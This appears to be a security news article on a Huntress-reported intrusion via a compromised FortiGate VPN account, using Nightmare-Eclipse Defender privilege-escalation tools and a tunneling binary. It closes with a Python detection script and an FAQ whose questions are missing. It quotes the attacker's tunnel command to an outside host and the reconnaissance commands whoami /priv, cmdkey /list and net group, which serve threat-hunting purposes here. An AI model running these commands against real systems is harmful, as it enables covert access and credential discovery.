Hackers use Nightmare-Eclipse tools after FortiGate SSL VPN compromise
Threat hunters have confirmed the first real-world intrusion where attackers used the publicly released Nightmare-Eclipse toolkit after gaining access through what appears to be a compromised FortiGate SSL VPN account. Huntress says the activity included BlueHammer, RedSun, and UnDefend, along with a separate tunneling tool it calls BeigeBurrow.
The case matters because it shows how quickly public exploit tooling can move from proof-of-concept release to live enterprise abuse. Huntress says the attackers relied on valid VPN credentials, staged binaries in user-writable folders, ran post-compromise discovery commands, and attempted to use Defender-focused privilege escalation tools that had already become widely available online.
Microsoft patched BlueHammer in April 2026 as CVE-2026-33825, but RedSun and UnDefend remained unpatched as of the Huntress report. NVD describes CVE-2026-33825 as an elevation-of-privilege flaw in Microsoft Defender that allows a local authorized attacker to gain higher privileges.
How the intrusion unfolded
Huntress says it first saw suspected in-the-wild BlueHammer activity on April 10, 2026, when a binary named FunnyApp.exe ran from a user’s Pictures folder and was then quarantined by Microsoft Defender. Several days later, analysts saw RedSun.exe launched from the Downloads directory and multiple executions of the UnDefend binary from short folder paths.
The suspected initial access point was a FortiGate SSL VPN login using valid credentials. Huntress says the victim organization later provided VPN logs showing one session from an IP geolocated to Russia, followed by additional unauthorized sessions from Singapore and Switzerland tied to the same account. Huntress presents that pattern as evidence consistent with credential abuse.
Fortinet has separately warned that valid-account VPN abuse remains a common intrusion path, especially where remote access lacks strong controls such as MFA. In a threat research post published in late 2025, the company said adversaries had used valid credentials to authenticate to VPN infrastructure and gain broad internal access.
What the Nightmare-Eclipse tools do
BlueHammer, RedSun, and UnDefend all target Microsoft Defender behavior. Huntress says BlueHammer was the first of the set to appear in this intrusion, and Microsoft fixed the underlying flaw in April 2026 under CVE-2026-33825. NVD lists the issue as a Microsoft Defender elevation-of-privilege vulnerability with local attack requirements and high impact to confidentiality, integrity, and availability.
RedSun appears more serious operationally because it still worked on fully patched Windows systems after April Patch Tuesday, according to third-party security analyses. Vectra and Cyderes both say RedSun abuses Defender-related behavior to overwrite a protected service binary and gain SYSTEM-level execution without administrator rights.
UnDefend serves a different role. Rather than escalating privileges directly, it attempts to weaken Defender protections and interfere with updates or core security functions. Huntress says the threat actor in this case used the tool clumsily, including a misspelled -agressive flag, which suggested incomplete familiarity with the publicly released tooling.
BeigeBurrow was the tool that actually worked
The most important part of the incident may not have been the failed privilege escalation attempts. Huntress says the only tool that clearly achieved its goal was a Go-based Windows binary it named BeigeBurrow, executed as agent.exe -server staybud.dpdns[.]org:443 -hide. The binary used HashiCorp’s Yamux library to create a covert relay channel over port 443.
That detail matters because port 443 blends into normal encrypted traffic in many enterprise environments. Huntress says BeigeBurrow successfully established outbound connectivity, making it the one component in the observed toolkit that produced a working attacker channel. The company also says it has seen BeigeBurrow in at least one other unrelated intrusion, though it did not attribute the activity to a specific threat group.
Huntress also observed hands-on-keyboard behavior after the initial access phase. Investigators saw common post-exploitation commands such as whoami /priv, cmdkey /list, and net group, including one odd case where whoami /priv was launched from an M365Copilot.exe process. Huntress said it could not fully explain that parent-child relationship.
At a glance
| Tool or artifact | Role in the intrusion | Outcome |
|---|---|---|
| BlueHammer | Defender privilege escalation tool tied to CVE-2026-33825 | Attempted, but did not succeed |
| RedSun | Defender-targeting local privilege escalation tool | Attempted, but did not succeed |
| UnDefend | Tool designed to degrade Defender protections | Interrupted during response |
| BeigeBurrow | Go-based tunneling and relay utility over port 443 | Successfully connected outbound |
| FortiGate SSL VPN access | Likely initial access using valid credentials | Enabled unauthorized remote sessions |
Why defenders should pay attention
This intrusion shows a pattern that security teams will likely see again. Public exploit releases do not need to be sophisticated to create real risk. Even when the operator makes mistakes, a working VPN login plus commodity post-exploitation tooling can still produce meaningful access inside a victim network.
The failed BlueHammer, RedSun, and UnDefend runs should not reassure defenders too much. Huntress stopped the activity before those tools could complete their goals, but BeigeBurrow connected successfully and the attacker was already performing internal discovery. In practical terms, that means the intrusion had already crossed from attempted abuse into active compromise.
It also underlines a basic point about remote access security. A patched endpoint can still be at risk if attackers get in first through stolen or reused credentials. Fortinet’s own research has repeatedly emphasized that valid-account abuse remains central to financially motivated intrusions, especially where MFA is absent or weakly enforced.
Recommended actions
- Apply Microsoft’s April 2026 security updates that fix CVE-2026-33825.
- Hunt for FunnyApp.exe, RedSun.exe, undef.exe, z.exe, and suspicious binaries in user-writable folders.
- Review VPN logs for impossible-travel patterns or multiple-country logins tied to the same user.
- Investigate any agent.exe execution with -server and -hide flags, especially outbound connections to unusual domains over port 443.
- Alert on whoami /priv, cmdkey /list, and net group when launched from unusual parent processes.
- Enforce MFA on FortiGate SSL VPN and other remote access systems, then rotate credentials for accounts that show suspicious access.
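The following is an added detection sketch, not code from Huntress or from this article, that turns three of the hunting points above (the agent.exe -server/-hide pattern, discovery commands such as whoami /priv launched from an unexpected parent as described in the intrusion narrative, and multi-country VPN logins on one account) into checks over constructed sample telemetry. The event field names, the allowlist of "expected" shell parents, the 24-hour window, and the sample paths and IP addresses are all assumptions chosen for the example; adapt them to your own EDR and VPN log schemas.

```python
"""Triage rules for the tradecraft described above, run over constructed sample data."""
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands named in the article; matched after command-line normalisation.
DISCOVERY_COMMANDS = ("whoami /priv", "cmdkey /list", "net group")
# Assumption: interactive shells are the only parents from which these are expected.
EXPECTED_SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed process events (schema and paths are assumptions, not Huntress telemetry).
PROCESS_EVENTS = [
    {"ts": "2026-04-15T09:02:11", "host": "WS-042", "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "C:\\Users\\jdoe\\Downloads\\agent.exe -server staybud.dpdns[.]org:443 -hide"},
    {"ts": "2026-04-15T09:05:40", "host": "WS-042",
     "parent": "C:\\Users\\jdoe\\AppData\\Local\\Microsoft\\M365Copilot.exe",  # hypothetical path
     "cmdline": "whoami /priv"},
    {"ts": "2026-04-15T09:06:02", "host": "WS-042", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "net group"},
    {"ts": "2026-04-15T09:07:30", "host": "WS-042", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "agent.exe -version"},  # benign-looking: lacks the -server/-hide pair
]

# Constructed VPN session records using documentation IP ranges.
VPN_SESSIONS = [
    {"ts": "2026-04-14T22:10:00", "user": "jdoe", "src_ip": "203.0.113.10", "country": "RU"},
    {"ts": "2026-04-15T03:45:00", "user": "jdoe", "src_ip": "198.51.100.7", "country": "SG"},
    {"ts": "2026-04-15T08:30:00", "user": "jdoe", "src_ip": "192.0.2.55", "country": "CH"},
    {"ts": "2026-04-15T08:00:00", "user": "asmith", "src_ip": "192.0.2.80", "country": "US"},
    {"ts": "2026-04-15T17:00:00", "user": "asmith", "src_ip": "192.0.2.81", "country": "US"},
]


def _basename(path):
    return ntpath.basename(path).lower()


def normalize_cmdline(cmdline):
    """Reduce 'C:\\...\\whoami.exe /priv' to 'whoami /priv' so rules match regardless of path."""
    toks = cmdline.split()
    if not toks:
        return ""
    first = _basename(toks[0])
    if first.endswith(".exe"):
        first = first[:-4]
    return " ".join([first] + [t.lower() for t in toks[1:]])


def is_tunnel_agent(event):
    """agent.exe invoked with both -server and -hide, the pattern the article flags."""
    toks = normalize_cmdline(event["cmdline"]).split()
    return bool(toks) and toks[0] == "agent" and {"-server", "-hide"} <= set(toks[1:])


def is_discovery_from_odd_parent(event):
    """A listed discovery command whose parent is not an expected interactive shell."""
    norm = normalize_cmdline(event["cmdline"])
    if not any(norm.startswith(cmd) for cmd in DISCOVERY_COMMANDS):
        return False
    return _basename(event["parent"]) not in EXPECTED_SHELL_PARENTS


def multi_country_logins(sessions, window=timedelta(hours=24)):
    """Return {user: sorted countries} for accounts seen from more than one country
    within any span of `window`. Simple rule chosen for the example, not a vendor's."""
    by_user = defaultdict(list)
    for s in sessions:
        by_user[s["user"]].append((datetime.fromisoformat(s["ts"]), s["country"]))
    hits = {}
    for user, rows in by_user.items():
        rows.sort()
        for i, (t0, c0) in enumerate(rows):
            countries = {c0}
            for t1, c1 in rows[i + 1:]:
                if t1 - t0 > window:
                    break
                countries.add(c1)
            if len(countries) > 1:
                hits.setdefault(user, set()).update(countries)
    return {u: sorted(c) for u, c in hits.items()}


def triage(process_events, vpn_sessions):
    """Apply all three rules and return (rule_name, detail) pairs for analyst review."""
    alerts = []
    for ev in process_events:
        if is_tunnel_agent(ev):
            alerts.append(("tunnel-agent", f"{ev['host']} {ev['cmdline']}"))
        if is_discovery_from_odd_parent(ev):
            alerts.append(("discovery-odd-parent",
                           f"{ev['host']} {_basename(ev['parent'])} -> {ev['cmdline']}"))
    for user, countries in multi_country_logins(vpn_sessions).items():
        alerts.append(("vpn-multi-country", f"{user} {','.join(countries)}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in triage(PROCESS_EVENTS, VPN_SESSIONS):
        print(f"[{rule}] {detail}")
```

Run against the embedded sample data, this yields one alert per rule: the agent.exe launch, the whoami /priv child of M365Copilot.exe, and the jdoe account seen from three countries in under 24 hours. The parent allowlist is the part most worth tuning, since legitimate management tooling will also spawn net group on some estates.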
FAQ
Yes. Microsoft fixed BlueHammer in April 2026 as CVE-2026-33825. NVD lists it as a local elevation-of-privilege flaw in Microsoft Defender.
As of the Huntress report published on April 21, 2026, Huntress said RedSun and UnDefend remained unpatched. Some third-party security vendors also described both as still usable against updated Windows systems at that time.
No. Huntress says BlueHammer did not dump SAM credentials, RedSun did not overwrite TieringEngineService.exe, and UnDefend was interrupted during remediation. BeigeBurrow was the only observed component that clearly achieved its intended purpose.
Huntress says the most likely entry point was FortiGate SSL VPN access using valid credentials. The company based that conclusion on customer-provided VPN logs and multi-country login activity tied to the same account.